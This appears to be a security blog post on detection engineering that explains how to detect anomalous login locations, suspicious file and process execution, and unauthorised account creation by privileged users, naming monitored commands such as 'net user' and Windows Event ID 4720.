3 Effective Detection Use Cases for Identifying and Mitigating Threats

In today’s digital landscape, where the number, speed and sophistication of cyber threats are constantly increasing, security teams must be able to quickly identify and respond to threats or breaches while minimizing the impact of a security incident on the organization.

One way to achieve this is by strategic detection engineering. This is a process of designing and implementing systems and processes that can identify and alert security professionals to potential security threats or breaches. These systems and processes are designed to continuously monitor for signs of compromise or unusual activity and provide alerts when potential threats are detected. The goal of detection engineering is to create an automated system of threat detection that is customizable, flexible, repeatable, and produces high quality alerts for security teams to act upon. This approach is critical in helping organizations to protect their systems, data, and assets from cyber threats, and to minimize the impact of a security incident.

An effective asset management strategy involves maintaining a comprehensive inventory of all assets, continuously monitoring and tracking those assets, and being able to quickly detect and respond to any potential unauthorized activity. By doing so, an organization can proactively identify and mitigate potential threats. This helps to minimize the potential impact of a security breach and protect the organization’s assets and data.

Here are three examples of detection use cases that are typically effective at identifying and defending against malicious activity, along with the tactic used by threat actors in each case:

Anomalous login geolocation

Tactic: Initial Access

Threat actors may use compromised credentials to gain unauthorized access to systems and resources within a network. They may use these credentials to bypass security controls and gain initial access, maintain persistence, escalate privileges, or evade detection. Compromised credentials may also allow them to remotely access systems and services such as VPNs, Outlook Web Access, network devices, and remote desktop for prolonged periods of time.

Unusual login times or locations can be useful indicators of potential security breaches, issues with account access or authentication processes, and inefficiencies in business operations. While it is possible for a user’s login location to be disguised by means such as a compromised server, VPN, or proxy, geolocation detection can still be used to identify potentially suspicious login behavior.

Suspicious file or process activity on a host

Tactic: Execution

Threat actors may use legitimate system tools and commands to blend in with regular system activity and evade detection. A user may inadvertently download a malicious file disguised as a legitimate program, which may then install and execute remote access scripts, a backdoor, ransomware, spyware, adware, or other malicious software.

During the execution phase of an attack, the threat actor’s code is attempting to run. This code may be paired with techniques from other tactics to achieve broader goals, such as probing a network or stealing data. It is important to detect this activity because identifying and blocking unauthorized access to one host may prevent the compromise of multiple systems.

During the execution phase of an attack, threat actors may use command and script interpreters such as PowerShell, the Unix or Windows command shell, to run commands, scripts, or binaries. To detect this activity, you can monitor command-line arguments for script execution and subsequent behavior. This may be related to network and system information discovery, collection, or other script-based post-compromise behaviors, and can serve as indicators of the source script. These scripts may have various effects on the system and may generate events, depending on the type of monitoring in place.

To detect malicious or suspicious files, you can use signature-based, behavioral-based, and/or heuristics-based detection. This involves using a database of known malicious software “signatures” to identify and block known threats, monitoring the behavior of programs and flagging any suspicious activity, and using algorithms to identify patterns that are typical of malicious software. It’s important to note that no single method is foolproof, and it’s best to use a combination of these techniques to detect and protect against malicious software.

Privileged user-created user accounts

Tactic: Persistence

Threat actors may leverage their access to a privileged user account, such as an administrator account, to create an additional account on a victim system to maintain access without the need to use persistent remote access tools, which are often easily detected and flagged as suspicious. By using a secondary account, they can continue to have access to the system without drawing as much attention to their activities. This can also allow them to maintain access even if their primary method of access is discovered or blocked.

To detect this type of activity, you can monitor executed commands and arguments for actions related to account creation, such as net user or useradd, and newly executed processes associated with account creation, such as net.exe. You can also monitor for newly created user accounts through account audits to identify suspicious accounts that may have been created by an unauthorized individual. Additionally, you can collect data on account creation using network logs or Windows Event ID 4720 (which is triggered when a user account is created on a Windows system and domain controller).

Although these detection use cases may not cover all potential threats, they can help monitor and prevent attacks at key stages in the attack chain.